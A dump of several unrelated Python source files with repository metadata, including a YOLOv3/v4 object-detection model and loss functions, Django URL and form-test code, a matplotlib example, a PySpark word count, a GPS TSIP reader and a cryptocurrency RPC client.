input_data = convolutional(input_data, (3, 3, 64, 128))
input_data = MaxPool2D(2, 2, 'same')(input_data)
input_data = convolutional(input_data, (3, 3, 128, 256))
route_1 = input_data
input_data = MaxPool2D(2, 2, 'same')(input_data)
input_data = convolutional(input_data, (3, 3, 256, 512))
input_data = MaxPool2D(2, 1, 'same')(input_data)
input_data = convolutional(input_data, (3, 3, 512, 1024))
return route_1, input_data
def cspdarknet53_tiny(input_data): # not sure how this should be called
input_data = convolutional(input_data, (3, 3, 3, 32), downsample=True)
input_data = convolutional(input_data, (3, 3, 32, 64), downsample=True)
input_data = convolutional(input_data, (3, 3, 64, 64))
route = input_data
input_data = route_group(input_data, 2, 1)
input_data = convolutional(input_data, (3, 3, 32, 32))
route_1 = input_data
input_data = convolutional(input_data, (3, 3, 32, 32))
input_data = tf.concat([input_data, route_1], axis=-1)
input_data = convolutional(input_data, (1, 1, 32, 64))
input_data = tf.concat([route, input_data], axis=-1)
input_data = MaxPool2D(2, 2, 'same')(input_data)
input_data = convolutional(input_data, (3, 3, 64, 128))
route = input_data
input_data = route_group(input_data, 2, 1)
input_data = convolutional(input_data, (3, 3, 64, 64))
route_1 = input_data
input_data = convolutional(input_data, (3, 3, 64, 64))
input_data = tf.concat([input_data, route_1], axis=-1)
input_data = convolutional(input_data, (1, 1, 64, 128))
input_data = tf.concat([route, input_data], axis=-1)
input_data = MaxPool2D(2, 2, 'same')(input_data)
input_data = convolutional(input_data, (3, 3, 128, 256))
route = input_data
input_data = route_group(input_data, 2, 1)
input_data = convolutional(input_data, (3, 3, 128, 128))
route_1 = input_data
input_data = convolutional(input_data, (3, 3, 128, 128))
input_data = tf.concat([input_data, route_1], axis=-1)
input_data = convolutional(input_data, (1, 1, 128, 256))
route_1 = input_data
input_data = tf.concat([route, input_data], axis=-1)
input_data = MaxPool2D(2, 2, 'same')(input_data)
input_data = convolutional(input_data, (3, 3, 512, 512))
return route_1, input_data
def YOLOv3(input_layer, NUM_CLASS):
# After the input layer enters the Darknet-53 network, we get three branches
route_1, route_2, conv = darknet53(input_layer)
# See the orange module (DBL) in the figure above, a total of 5 Subconvolution operation
conv = convolutional(conv, (1, 1, 1024, 512))
conv = convolutional(conv, (3, 3, 512, 1024))
conv = convolutional(conv, (1, 1, 1024, 512))
conv = convolutional(conv, (3, 3, 512, 1024))
conv = convolutional(conv, (1, 1, 1024, 512))
conv_lobj_branch = convolutional(conv, (3, 3, 512, 1024))
# conv_lbbox is used to predict large-sized objects , Shape = [None, 13, 13, 255]
conv_lbbox = convolutional(conv_lobj_branch, (1, 1, 1024, 3*(NUM_CLASS + 5)), activate=False, bn=False)
conv = convolutional(conv, (1, 1, 512, 256))
# upsample here uses the nearest neighbor interpolation method, which has the advantage that the
# upsampling process does not need to learn, thereby reducing the network parameter
conv = upsample(conv)
conv = tf.concat([conv, route_2], axis=-1)
conv = convolutional(conv, (1, 1, 768, 256))
conv = convolutional(conv, (3, 3, 256, 512))
conv = convolutional(conv, (1, 1, 512, 256))
conv = convolutional(conv, (3, 3, 256, 512))
conv = convolutional(conv, (1, 1, 512, 256))
conv_mobj_branch = convolutional(conv, (3, 3, 256, 512))
# conv_mbbox is used to predict medium-sized objects, shape = [None, 26, 26, 255]
conv_mbbox = convolutional(conv_mobj_branch, (1, 1, 512, 3*(NUM_CLASS + 5)), activate=False, bn=False)
conv = convolutional(conv, (1, 1, 256, 128))
conv = upsample(conv)
conv = tf.concat([conv, route_1], axis=-1)
conv = convolutional(conv, (1, 1, 384, 128))
conv = convolutional(conv, (3, 3, 128, 256))
conv = convolutional(conv, (1, 1, 256, 128))
conv = convolutional(conv, (3, 3, 128, 256))
conv = convolutional(conv, (1, 1, 256, 128))
conv_sobj_branch = convolutional(conv, (3, 3, 128, 256))
# conv_sbbox is used to predict small size objects, shape = [None, 52, 52, 255]
conv_sbbox = convolutional(conv_sobj_branch, (1, 1, 256, 3*(NUM_CLASS +5)), activate=False, bn=False)
return [conv_sbbox, conv_mbbox, conv_lbbox]
def YOLOv4(input_layer, NUM_CLASS):
route_1, route_2, conv = cspdarknet53(input_layer)
route = conv
conv = convolutional(conv, (1, 1, 512, 256))
conv = upsample(conv)
route_2 = convolutional(route_2, (1, 1, 512, 256))
conv = tf.concat([route_2, conv], axis=-1)
conv = convolutional(conv, (1, 1, 512, 256))
conv = convolutional(conv, (3, 3, 256, 512))
conv = convolutional(conv, (1, 1, 512, 256))
conv = convolutional(conv, (3, 3, 256, 512))
conv = convolutional(conv, (1, 1, 512, 256))
route_2 = conv
conv = convolutional(conv, (1, 1, 256, 128))
conv = upsample(conv)
route_1 = convolutional(route_1, (1, 1, 256, 128))
conv = tf.concat([route_1, conv], axis=-1)
conv = convolutional(conv, (1, 1, 256, 128))
conv = convolutional(conv, (3, 3, 128, 256))
conv = convolutional(conv, (1, 1, 256, 128))
conv = convolutional(conv, (3, 3, 128, 256))
conv = convolutional(conv, (1, 1, 256, 128))
route_1 = conv
conv = convolutional(conv, (3, 3, 128, 256))
conv_sbbox = convolutional(conv, (1, 1, 256, 3 * (NUM_CLASS + 5)), activate=False, bn=False)
conv = convolutional(route_1, (3, 3, 128, 256), downsample=True)
conv = tf.concat([conv, route_2], axis=-1)
conv = convolutional(conv, (1, 1, 512, 256))
conv = convolutional(conv, (3, 3, 256, 512))
conv = convolutional(conv, (1, 1, 512, 256))
conv = convolutional(conv, (3, 3, 256, 512))
conv = convolutional(conv, (1, 1, 512, 256))
route_2 = conv
conv = convolutional(conv, (3, 3, 256, 512))
conv_mbbox = convolutional(conv, (1, 1, 512, 3 * (NUM_CLASS + 5)), activate=False, bn=False)
conv = convolutional(route_2, (3, 3, 256, 512), downsample=True)
conv = tf.concat([conv, route], axis=-1)
conv = convolutional(conv, (1, 1, 1024, 512))
conv = convolutional(conv, (3, 3, 512, 1024))
conv = convolutional(conv, (1, 1, 1024, 512))
conv = convolutional(conv, (3, 3, 512, 1024))
conv = convolutional(conv, (1, 1, 1024, 512))
conv = convolutional(conv, (3, 3, 512, 1024))
conv_lbbox = convolutional(conv, (1, 1, 1024, 3 * (NUM_CLASS + 5)), activate=False, bn=False)
return [conv_sbbox, conv_mbbox, conv_lbbox]
def YOLOv3_tiny(input_layer, NUM_CLASS):
# After the input layer enters the Darknet-53 network, we get three branches
route_1, conv = darknet19_tiny(input_layer)
conv = convolutional(conv, (1, 1, 1024, 256))
conv_lobj_branch = convolutional(conv, (3, 3, 256, 512))
# conv_lbbox is used to predict large-sized objects , Shape = [None, 26, 26, 255]
conv_lbbox = convolutional(conv_lobj_branch, (1, 1, 512, 3*(NUM_CLASS + 5)), activate=False, bn=False)
conv = convolutional(conv, (1, 1, 256, 128))
# upsample here uses the nearest neighbor interpolation method, which has the advantage that the
# upsampling process does not need to learn, thereby reducing the network parameter
conv = upsample(conv)
conv = tf.concat([conv, route_1], axis=-1)
conv_mobj_branch = convolutional(conv, (3, 3, 128, 256))
# conv_mbbox is used to predict medium size objects, shape = [None, 13, 13, 255]
conv_mbbox = convolutional(conv_mobj_branch, (1, 1, 256, 3 * (NUM_CLASS + 5)), activate=False, bn=False)
return [conv_mbbox, conv_lbbox]
def YOLOv4_tiny(input_layer, NUM_CLASS):
route_1, conv = cspdarknet53_tiny(input_layer)
conv = convolutional(conv, (1, 1, 512, 256))
conv_lobj_branch = convolutional(conv, (3, 3, 256, 512))
conv_lbbox = convolutional(conv_lobj_branch, (1, 1, 512, 3 * (NUM_CLASS + 5)), activate=False, bn=False)
conv = convolutional(conv, (1, 1, 256, 128))
conv = upsample(conv)
conv = tf.concat([conv, route_1], axis=-1)
conv_mobj_branch = convolutional(conv, (3, 3, 128, 256))
conv_mbbox = convolutional(conv_mobj_branch, (1, 1, 256, 3 * (NUM_CLASS + 5)), activate=False, bn=False)
return [conv_mbbox, conv_lbbox]
def Create_Yolo(input_size=416, channels=3, training=False, CLASSES=YOLO_COCO_CLASSES):
NUM_CLASS = len(read_class_names(CLASSES))
input_layer = Input([input_size, input_size, channels])
if TRAIN_YOLO_TINY:
if YOLO_TYPE == "yolov4":
conv_tensors = YOLOv4_tiny(input_layer, NUM_CLASS)
if YOLO_TYPE == "yolov3":
conv_tensors = YOLOv3_tiny(input_layer, NUM_CLASS)
else:
if YOLO_TYPE == "yolov4":
conv_tensors = YOLOv4(input_layer, NUM_CLASS)
if YOLO_TYPE == "yolov3":
conv_tensors = YOLOv3(input_layer, NUM_CLASS)
output_tensors = []
for i, conv_tensor in enumerate(conv_tensors):
pred_tensor = decode(conv_tensor, NUM_CLASS, i)
if training: output_tensors.append(conv_tensor)
output_tensors.append(pred_tensor)
Yolo = tf.keras.Model(input_layer, output_tensors)
return Yolo
def decode(conv_output, NUM_CLASS, i=0):
# where i = 0, 1 or 2 to correspond to the three grid scales
conv_shape = tf.shape(conv_output)
batch_size = conv_shape[0]
output_size = conv_shape[1]
conv_output = tf.reshape(conv_output, (batch_size, output_size, output_size, 3, 5 + NUM_CLASS))
#conv_raw_dxdy = conv_output[:, :, :, :, 0:2] # offset of center position
#conv_raw_dwdh = conv_output[:, :, :, :, 2:4] # Prediction box length and width offset
#conv_raw_conf = conv_output[:, :, :, :, 4:5] # confidence of the prediction box
#conv_raw_prob = conv_output[:, :, :, :, 5: ] # category probability of the prediction box
conv_raw_dxdy, conv_raw_dwdh, conv_raw_conf, conv_raw_prob = tf.split(conv_output, (2, 2, 1, NUM_CLASS), axis=-1)
# next need Draw the grid. Where output_size is equal to 13, 26 or 52
#y = tf.range(output_size, dtype=tf.int32)
#y = tf.expand_dims(y, -1)
#y = tf.tile(y, [1, output_size])
#x = tf.range(output_size,dtype=tf.int32)
#x = tf.expand_dims(x, 0)
#x = tf.tile(x, [output_size, 1])
xy_grid = tf.meshgrid(tf.range(output_size), tf.range(output_size))
xy_grid = tf.expand_dims(tf.stack(xy_grid, axis=-1), axis=2) # [gx, gy, 1, 2]
xy_grid = tf.tile(tf.expand_dims(xy_grid, axis=0), [batch_size, 1, 1, 3, 1])
xy_grid = tf.cast(xy_grid, tf.float32)
#xy_grid = tf.concat([x[:, :, tf.newaxis], y[:, :, tf.newaxis]], axis=-1)
#xy_grid = tf.tile(xy_grid[tf.newaxis, :, :, tf.newaxis, :], [batch_size, 1, 1, 3, 1])
#y_grid = tf.cast(xy_grid, tf.float32)
# Calculate the center position of the prediction box:
pred_xy = (tf.sigmoid(conv_raw_dxdy) + xy_grid) * STRIDES[i]
# Calculate the length and width of the prediction box:
pred_wh = (tf.exp(conv_raw_dwdh) * ANCHORS[i]) * STRIDES[i]
pred_xywh = tf.concat([pred_xy, pred_wh], axis=-1)
pred_conf = tf.sigmoid(conv_raw_conf) # object box calculates the predicted confidence
pred_prob = tf.sigmoid(conv_raw_prob) # calculating the predicted probability category box object
# calculating the predicted probability category box object
return tf.concat([pred_xywh, pred_conf, pred_prob], axis=-1)
def bbox_iou(boxes1, boxes2):
boxes1_area = boxes1[..., 2] * boxes1[..., 3]
boxes2_area = boxes2[..., 2] * boxes2[..., 3]
boxes1 = tf.concat([boxes1[..., :2] - boxes1[..., 2:] * 0.5,
boxes1[..., :2] + boxes1[..., 2:] * 0.5], axis=-1)
boxes2 = tf.concat([boxes2[..., :2] - boxes2[..., 2:] * 0.5,
boxes2[..., :2] + boxes2[..., 2:] * 0.5], axis=-1)
left_up = tf.maximum(boxes1[..., :2], boxes2[..., :2])
right_down = tf.minimum(boxes1[..., 2:], boxes2[..., 2:])
inter_section = tf.maximum(right_down - left_up, 0.0)
inter_area = inter_section[..., 0] * inter_section[..., 1]
union_area = boxes1_area + boxes2_area - inter_area
return 1.0 * inter_area / union_area
def bbox_giou(boxes1, boxes2):
boxes1 = tf.concat([boxes1[..., :2] - boxes1[..., 2:] * 0.5,
boxes1[..., :2] + boxes1[..., 2:] * 0.5], axis=-1)
boxes2 = tf.concat([boxes2[..., :2] - boxes2[..., 2:] * 0.5,
boxes2[..., :2] + boxes2[..., 2:] * 0.5], axis=-1)
boxes1 = tf.concat([tf.minimum(boxes1[..., :2], boxes1[..., 2:]),
tf.maximum(boxes1[..., :2], boxes1[..., 2:])], axis=-1)
boxes2 = tf.concat([tf.minimum(boxes2[..., :2], boxes2[..., 2:]),
tf.maximum(boxes2[..., :2], boxes2[..., 2:])], axis=-1)
boxes1_area = (boxes1[..., 2] - boxes1[..., 0]) * (boxes1[..., 3] - boxes1[..., 1])
boxes2_area = (boxes2[..., 2] - boxes2[..., 0]) * (boxes2[..., 3] - boxes2[..., 1])
left_up = tf.maximum(boxes1[..., :2], boxes2[..., :2])
right_down = tf.minimum(boxes1[..., 2:], boxes2[..., 2:])
inter_section = tf.maximum(right_down - left_up, 0.0)
inter_area = inter_section[..., 0] * inter_section[..., 1]
union_area = boxes1_area + boxes2_area - inter_area
# Calculate the iou value between the two bounding boxes
iou = inter_area / union_area
# Calculate the coordinates of the upper left corner and the lower right corner of the smallest closed convex surface
enclose_left_up = tf.minimum(boxes1[..., :2], boxes2[..., :2])
enclose_right_down = tf.maximum(boxes1[..., 2:], boxes2[..., 2:])
enclose = tf.maximum(enclose_right_down - enclose_left_up, 0.0)
# Calculate the area of the smallest closed convex surface C
enclose_area = enclose[..., 0] * enclose[..., 1]
# Calculate the GIoU value according to the GioU formula
giou = iou - 1.0 * (enclose_area - union_area) / enclose_area
return giou
# testing (should be better than giou)
def bbox_ciou(boxes1, boxes2):
boxes1_coor = tf.concat([boxes1[..., :2] - boxes1[..., 2:] * 0.5,
boxes1[..., :2] + boxes1[..., 2:] * 0.5], axis=-1)
boxes2_coor = tf.concat([boxes2[..., :2] - boxes2[..., 2:] * 0.5,
boxes2[..., :2] + boxes2[..., 2:] * 0.5], axis=-1)
left = tf.maximum(boxes1_coor[..., 0], boxes2_coor[..., 0])
up = tf.maximum(boxes1_coor[..., 1], boxes2_coor[..., 1])
right = tf.maximum(boxes1_coor[..., 2], boxes2_coor[..., 2])
down = tf.maximum(boxes1_coor[..., 3], boxes2_coor[..., 3])
c = (right - left) * (right - left) + (up - down) * (up - down)
iou = bbox_iou(boxes1, boxes2)
u = (boxes1[..., 0] - boxes2[..., 0]) * (boxes1[..., 0] - boxes2[..., 0]) + (boxes1[..., 1] - boxes2[..., 1]) * (boxes1[..., 1] - boxes2[..., 1])
d = u / c
ar_gt = boxes2[..., 2] / boxes2[..., 3]
ar_pred = boxes1[..., 2] / boxes1[..., 3]
ar_loss = 4 / (np.pi * np.pi) * (tf.atan(ar_gt) - tf.atan(ar_pred)) * (tf.atan(ar_gt) - tf.atan(ar_pred))
alpha = ar_loss / (1 - iou + ar_loss + 0.000001)
ciou_term = d + alpha * ar_loss
return iou - ciou_term
def compute_loss(pred, conv, label, bboxes, i=0, CLASSES=YOLO_COCO_CLASSES):
NUM_CLASS = len(read_class_names(CLASSES))
conv_shape = tf.shape(conv)
batch_size = conv_shape[0]
output_size = conv_shape[1]
input_size = STRIDES[i] * output_size
conv = tf.reshape(conv, (batch_size, output_size, output_size, 3, 5 + NUM_CLASS))
conv_raw_conf = conv[:, :, :, :, 4:5]
conv_raw_prob = conv[:, :, :, :, 5:]
pred_xywh = pred[:, :, :, :, 0:4]
pred_conf = pred[:, :, :, :, 4:5]
label_xywh = label[:, :, :, :, 0:4]
respond_bbox = label[:, :, :, :, 4:5]
label_prob = label[:, :, :, :, 5:]
giou = tf.expand_dims(bbox_giou(pred_xywh, label_xywh), axis=-1)
input_size = tf.cast(input_size, tf.float32)
bbox_loss_scale = 2.0 - 1.0 * label_xywh[:, :, :, :, 2:3] * label_xywh[:, :, :, :, 3:4] / (input_size ** 2)
giou_loss = respond_bbox * bbox_loss_scale * (1 - giou)
iou = bbox_iou(pred_xywh[:, :, :, :, np.newaxis, :], bboxes[:, np.newaxis, np.newaxis, np.newaxis, :, :])
# Find the value of IoU with the real box The largest prediction box
max_iou = tf.expand_dims(tf.reduce_max(iou, axis=-1), axis=-1)
# If the largest iou is less than the threshold, it is considered that the prediction box contains no objects, then the background box
respond_bgd = (1.0 - respond_bbox) * tf.cast( max_iou < YOLO_IOU_LOSS_THRESH, tf.float32 )
conf_focal = tf.pow(respond_bbox - pred_conf, 2)
# Calculate the loss of confidence
# we hope that if the grid contains objects, then the network output prediction box has a confidence of 1 and 0 when there is no object.
conf_loss = conf_focal * (
respond_bbox * tf.nn.sigmoid_cross_entropy_with_logits(labels=respond_bbox, logits=conv_raw_conf)
+
respond_bgd * tf.nn.sigmoid_cross_entropy_with_logits(labels=respond_bbox, logits=conv_raw_conf)
)
prob_loss = respond_bbox * tf.nn.sigmoid_cross_entropy_with_logits(labels=label_prob, logits=conv_raw_prob)
giou_loss = tf.reduce_mean(tf.reduce_sum(giou_loss, axis=[1,2,3,4]))
conf_loss = tf.reduce_mean(tf.reduce_sum(conf_loss, axis=[1,2,3,4]))
prob_loss = tf.reduce_mean(tf.reduce_sum(prob_loss, axis=[1,2,3,4]))
return giou_loss, conf_loss, prob_loss
| 45.201754
| 155
| 0.645954
|
e805211ad3f483682aee21facd5a3d5979a0dd91
| 530
|
py
|
Python
|
restaurateur/urls.py
|
FaHoLo/Star_burger
|
e0d13400a9bd3f8d7427f62dbc6375ca275ee158
|
[
"MIT"
] | null | null | null |
restaurateur/urls.py
|
FaHoLo/Star_burger
|
e0d13400a9bd3f8d7427f62dbc6375ca275ee158
|
[
"MIT"
] | null | null | null |
restaurateur/urls.py
|
FaHoLo/Star_burger
|
e0d13400a9bd3f8d7427f62dbc6375ca275ee158
|
[
"MIT"
] | 1
|
2021-06-25T21:47:34.000Z
|
2021-06-25T21:47:34.000Z
|
from django.urls import path
from django.shortcuts import redirect
from . import views
app_name = "restaurateur"
urlpatterns = [
path('', lambda request: redirect('restaurateur:ProductsView')),
path('products/', views.view_products, name="ProductsView"),
path('restaurants/', views.view_restaurants, name="RestaurantView"),
path('orders/', views.view_orders, name="view_orders"),
path('login/', views.LoginView.as_view(), name="login"),
path('logout/', views.LogoutView.as_view(), name="logout"),
]
| 26.5
| 72
| 0.70566
|
846afd7b9018d603bc640de39444e34402aeda91
| 337
|
py
|
Python
|
doc/pyplots/annotation_basic.py
|
pierre-haessig/matplotlib
|
0d945044ca3fbf98cad55912584ef80911f330c6
|
[
"MIT",
"PSF-2.0",
"BSD-3-Clause"
] | 16
|
2016-06-14T19:45:35.000Z
|
2020-11-30T19:02:58.000Z
|
doc/pyplots/annotation_basic.py
|
pierre-haessig/matplotlib
|
0d945044ca3fbf98cad55912584ef80911f330c6
|
[
"MIT",
"PSF-2.0",
"BSD-3-Clause"
] | 7
|
2015-05-08T19:36:25.000Z
|
2015-06-30T15:32:17.000Z
|
doc/pyplots/annotation_basic.py
|
pierre-haessig/matplotlib
|
0d945044ca3fbf98cad55912584ef80911f330c6
|
[
"MIT",
"PSF-2.0",
"BSD-3-Clause"
] | 14
|
2015-10-05T04:15:46.000Z
|
2020-06-11T18:06:02.000Z
|
import numpy as np
import matplotlib.pyplot as plt
fig = plt.figure()
ax = fig.add_subplot(111)
t = np.arange(0.0, 5.0, 0.01)
s = np.cos(2*np.pi*t)
line, = ax.plot(t, s, lw=2)
ax.annotate('local max', xy=(2, 1), xytext=(3, 1.5),
arrowprops=dict(facecolor='black', shrink=0.05),
)
ax.set_ylim(-2,2)
plt.show()
| 19.823529
| 60
| 0.602374
|
e05e9cf02d33b705f9c5dca07e99d1c309de8d51
| 3,597
|
py
|
Python
|
ax/modelbridge/transforms/int_range_to_choice.py
|
sparks-baird/Ax
|
57ba8714902ac218eb87dc2f90090678aa307a43
|
[
"MIT"
] | null | null | null |
ax/modelbridge/transforms/int_range_to_choice.py
|
sparks-baird/Ax
|
57ba8714902ac218eb87dc2f90090678aa307a43
|
[
"MIT"
] | null | null | null |
ax/modelbridge/transforms/int_range_to_choice.py
|
sparks-baird/Ax
|
57ba8714902ac218eb87dc2f90090678aa307a43
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from typing import TYPE_CHECKING, Dict, List, Optional, Set
from ax.core.observation import ObservationData, ObservationFeatures
from ax.core.parameter import ChoiceParameter, Parameter, ParameterType, RangeParameter
from ax.core.search_space import RobustSearchSpace, SearchSpace
from ax.modelbridge.transforms.base import Transform
from ax.models.types import TConfig
if TYPE_CHECKING:
# import as module to make sphinx-autodoc-typehints happy
from ax import modelbridge as modelbridge_module # noqa F401 # pragma: no cover
class IntRangeToChoice(Transform):
"""Convert a RangeParameter of type int to a ordered ChoiceParameter.
Transform is done in-place.
"""
def __init__(
self,
search_space: SearchSpace,
observation_features: List[ObservationFeatures],
observation_data: List[ObservationData],
modelbridge: Optional["modelbridge_module.base.ModelBridge"] = None,
config: Optional[TConfig] = None,
) -> None:
# Identify parameters that should be transformed
self.transform_parameters: Set[str] = {
p_name
for p_name, p in search_space.parameters.items()
if isinstance(p, RangeParameter) and p.parameter_type == ParameterType.INT
}
def _transform_search_space(self, search_space: SearchSpace) -> SearchSpace:
transformed_parameters: Dict[str, Parameter] = {}
for p_name, p in search_space.parameters.items():
if p_name in self.transform_parameters and isinstance(p, RangeParameter):
# pyre-fixme[6]: Expected `int` for 1st param but got `float`.
values = list(range(p.lower, p.upper + 1))
target_value = (
None
if p.target_value is None
else next(i for i, v in enumerate(values) if v == p.target_value)
)
transformed_parameters[p_name] = ChoiceParameter(
name=p_name,
parameter_type=p.parameter_type,
# Expected `List[Optional[typing.Union[bool, float, str]]]` for
# 4th parameter `values` to call
# `ax.core.parameter.ChoiceParameter.__init__` but got
# `List[int]`.
# pyre-fixme[6]:
values=values,
is_ordered=True,
is_fidelity=p.is_fidelity,
target_value=target_value,
)
else:
transformed_parameters[p.name] = p
new_kwargs = {
"parameters": list(transformed_parameters.values()),
"parameter_constraints": [
pc.clone_with_transformed_parameters(
transformed_parameters=transformed_parameters
)
for pc in search_space.parameter_constraints
],
}
if isinstance(search_space, RobustSearchSpace):
new_kwargs["environmental_variables"] = list(
search_space._environmental_variables.values()
)
# pyre-ignore Incompatible parameter type [6]
new_kwargs["parameter_distributions"] = search_space.parameter_distributions
# pyre-ignore Incompatible parameter type [6]
return search_space.__class__(**new_kwargs)
| 42.821429
| 88
| 0.624409
|
9cb50af21a2fe3cc181aae2512b98c0bce169aca
| 915
|
py
|
Python
|
read_tsip.py
|
ZigmundRat/python-TSIP
|
79414f212e0253716298f14a22f29a124e48fb51
|
[
"BSD-2-Clause"
] | 7
|
2015-05-06T13:06:53.000Z
|
2019-12-11T11:05:25.000Z
|
read_tsip.py
|
ZigmundRat/python-TSIP
|
79414f212e0253716298f14a22f29a124e48fb51
|
[
"BSD-2-Clause"
] | 35
|
2015-06-17T21:51:07.000Z
|
2021-12-07T20:05:25.000Z
|
read_tsip.py
|
ZigmundRat/python-TSIP
|
79414f212e0253716298f14a22f29a124e48fb51
|
[
"BSD-2-Clause"
] | 10
|
2015-08-12T09:40:12.000Z
|
2022-02-09T10:58:12.000Z
|
#!/usr/bin/env python
"""
Read TSIP from a device of file.
(c) Markus Juenemann, 2015
"""
import sys
import os.path
import serial
import tsip
import time
import binascii
import logging
logging.basicConfig(level=logging.INFO)
def help():
sys.stderr.write("%s <file|device> [<baudrate>]\n")
sys.exit(1)
def main():
try:
source = sys.argv[1]
except IndexError:
help()
if os.path.isfile(source):
conn = open(source)
else:
try:
baud = int(sys.argv[2])
except IndexError:
baud = 9600
except TypeError:
help()
conn = serial.Serial(source ,baud)
gps = tsip.GPS(conn)
while True:
packet = gps.read()
if packet:
print "0x%0x %s" % (packet.code, packet.values)
else:
print 'None'
if __name__ == '__main__':
main()
| 15
| 59
| 0.549727
|
0cbd5b8b125dc48356cc1239cde6c2558e689021
| 3,032
|
py
|
Python
|
silicoin/rpc/rpc_client.py
|
zcomputerwiz/silicoin-light-wallet
|
1cdc3784effec229cc841a04655078b1d9913d33
|
[
"Apache-2.0"
] | null | null | null |
silicoin/rpc/rpc_client.py
|
zcomputerwiz/silicoin-light-wallet
|
1cdc3784effec229cc841a04655078b1d9913d33
|
[
"Apache-2.0"
] | null | null | null |
silicoin/rpc/rpc_client.py
|
zcomputerwiz/silicoin-light-wallet
|
1cdc3784effec229cc841a04655078b1d9913d33
|
[
"Apache-2.0"
] | null | null | null |
import asyncio
from ssl import SSLContext
from typing import Dict, List, Optional, Any
import aiohttp
from silicoin.server.server import NodeType, ssl_context_for_client
from silicoin.server.ssl_context import private_ssl_ca_paths
from silicoin.types.blockchain_format.sized_bytes import bytes32
from silicoin.util.byte_types import hexstr_to_bytes
from silicoin.util.ints import uint16
class RpcClient:
"""
Client to Silicoin RPC, connects to a local service. Uses HTTP/JSON, and converts back from
JSON into native python objects before returning. All api calls use POST requests.
Note that this is not the same as the peer protocol, or wallet protocol (which run Silicoin's
protocol on top of TCP), it's a separate protocol on top of HTTP that provides easy access
to the full node.
"""
url: str
session: aiohttp.ClientSession
closing_task: Optional[asyncio.Task]
ssl_context: Optional[SSLContext]
hostname: str
port: uint16
@classmethod
async def create(cls, self_hostname: str, port: uint16, root_path, net_config):
self = cls()
self.hostname = self_hostname
self.port = port
self.url = f"https://{self_hostname}:{str(port)}/"
self.session = aiohttp.ClientSession()
ca_crt_path, ca_key_path = private_ssl_ca_paths(root_path, net_config)
crt_path = root_path / net_config["daemon_ssl"]["private_crt"]
key_path = root_path / net_config["daemon_ssl"]["private_key"]
self.ssl_context = ssl_context_for_client(ca_crt_path, ca_key_path, crt_path, key_path)
self.closing_task = None
return self
async def fetch(self, path, request_json) -> Any:
async with self.session.post(self.url + path, json=request_json, ssl_context=self.ssl_context) as response:
response.raise_for_status()
res_json = await response.json()
if not res_json["success"]:
raise ValueError(res_json)
return res_json
async def get_connections(self, node_type: Optional[NodeType] = None) -> List[Dict]:
request = {}
if node_type is not None:
request["node_type"] = node_type.value
response = await self.fetch("get_connections", request)
for connection in response["connections"]:
connection["node_id"] = hexstr_to_bytes(connection["node_id"])
return response["connections"]
async def open_connection(self, host: str, port: int) -> Dict:
return await self.fetch("open_connection", {"host": host, "port": int(port)})
async def close_connection(self, node_id: bytes32) -> Dict:
return await self.fetch("close_connection", {"node_id": node_id.hex()})
async def stop_node(self) -> Dict:
return await self.fetch("stop_node", {})
def close(self):
self.closing_task = asyncio.create_task(self.session.close())
async def await_closed(self):
if self.closing_task is not None:
await self.closing_task
| 39.894737
| 115
| 0.690633
|
ee7d925680b56ae9b54ef367d34fb6f134949207
| 426
|
py
|
Python
|
rdd/WordCount.py
|
shubozhang/pyspark-tutorial
|
244f69bc75ad4238a00151dc7802bbb63e6f35e1
|
[
"MIT"
] | null | null | null |
rdd/WordCount.py
|
shubozhang/pyspark-tutorial
|
244f69bc75ad4238a00151dc7802bbb63e6f35e1
|
[
"MIT"
] | null | null | null |
rdd/WordCount.py
|
shubozhang/pyspark-tutorial
|
244f69bc75ad4238a00151dc7802bbb63e6f35e1
|
[
"MIT"
] | null | null | null |
from pyspark import SparkContext, SparkConf
if __name__ == "__main__":
conf = SparkConf().setAppName("word count").setMaster("local[3]")
sc = SparkContext(conf = conf)
lines = sc.textFile("in/word_count.text")
words = lines.flatMap(lambda line: line.split(" "))
wordCounts = words.countByValue()
for word, count in wordCounts.items():
print("{} : {}".format(word, count))
| 26.625
| 69
| 0.629108
|
f8ec40a4a91fd3dd2ea6050e42a1b2fbb20d26f9
| 2,773
|
py
|
Python
|
yatube/posts/tests/test_forms.py
|
vlad7632/hw03_forms
|
6a4d212ac3753b61513bf1e20931990655a2e4d1
|
[
"MIT"
] | null | null | null |
yatube/posts/tests/test_forms.py
|
vlad7632/hw03_forms
|
6a4d212ac3753b61513bf1e20931990655a2e4d1
|
[
"MIT"
] | null | null | null |
yatube/posts/tests/test_forms.py
|
vlad7632/hw03_forms
|
6a4d212ac3753b61513bf1e20931990655a2e4d1
|
[
"MIT"
] | null | null | null |
from django.contrib.auth import get_user_model
from django.test import Client, TestCase
from django.urls import reverse
from posts.forms import Post, PostForm
from posts.models import Group, Post
User = get_user_model()
class PostFormTest(TestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.user = User.objects.create_user(username='Vlad')
cls.guest_client = Client()
cls.authorized_client = Client()
cls.authorized_client.force_login(cls.user)
cls.group = Group.objects.create(
title='Заголовок',
slug='test_slug',
description='текстовоеполедлянаборатекста'
)
cls.group_new = Group.objects.create(
title='Заголовок_новый',
slug='test_slug_new',
description='текстовоеполедлянаборатекста'
)
cls.post = Post.objects.create(
text='Тестовый текст',
group=cls.group,
author=cls.user
)
cls.form = PostForm()
def test_create_post(self):
"""Проверка формы создания поста"""
post_count = Post.objects.count()
form_data = {
'text': 'Тестовый текст',
'group': PostFormTest.group.id,
}
response = self.authorized_client.post(
reverse('posts:post_create'),
data=form_data,
follow=True
)
self.assertRedirects(
response, reverse(
'posts:profile',
kwargs={'username': f'{self.user}'}
))
self.assertEqual(
Post.objects.count(),
post_count + 1)
self.assertTrue(
Post.objects.filter(
text='Тестовый текст',
group=PostFormTest.group.id
).exists())
def test_edit_post(self):
"""Проверка формы редактирования поста"""
form_data = {
'text': 'Тестовый тест 2',
'group': PostFormTest.group_new.id
}
response = self.authorized_client.post(
reverse(
'posts:update_post',
kwargs={'post_id': f'{self.post.id}'}),
data=form_data,
follow=True
)
self.assertRedirects(
response,
reverse(
'posts:post_detail',
kwargs={'post_id': f'{self.post.id}'}
))
self.assertTrue(
Post.objects.filter(
text='Тестовый тест 2',
group=PostFormTest.group_new.id
).exists())
self.assertFalse(
Post.objects.filter(
text='Тестовый текст',
group=PostFormTest.group.id
).exists())
| 30.811111
| 60
| 0.538406
|
68a4b5571803c8a3ab51ac4820427b976f34943c
| 156,155
|
py
|
Python
|
